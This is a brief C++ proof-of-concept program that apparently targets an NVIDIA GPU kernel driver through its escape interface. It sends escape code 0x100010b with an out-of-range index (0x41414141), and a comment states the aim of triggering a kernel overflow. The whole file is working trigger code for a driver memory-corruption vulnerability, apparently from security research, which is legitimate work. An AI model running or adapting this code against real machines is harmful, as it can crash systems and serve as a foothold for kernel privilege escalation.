// gpu_poc.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>

#include "Gpu.h"

#pragma pack(push, 1)
struct Escape100010bData {
  HANDLE handle;
  DWORD idx;
};
#pragma pack(pop)

using Escape100010b = NvEscape<Escape100010bData>;

static_assert(sizeof(Escape100010b) == 0x3c, "escape size");

int main() { 
  Gpu gpu;
  if (!gpu.Init()) {
    fprintf(stderr, "Failed to init gpu.\n");
    return 1;
  }

  Escape100010b escape(0x100010b, 0x4e562a2a);
  // not actually necessary to trigger the overflow, as the kernel should write
  // NULL to the pointer first.
  escape.data.handle = CreateEvent(nullptr, FALSE, FALSE, nullptr);
  escape.data.idx = 0x41414141;
  if (gpu.Escape(&escape, sizeof(escape))) {
    fprintf(stderr, "Failed escape.\n");
    return 1;
  }

  return 0;
}

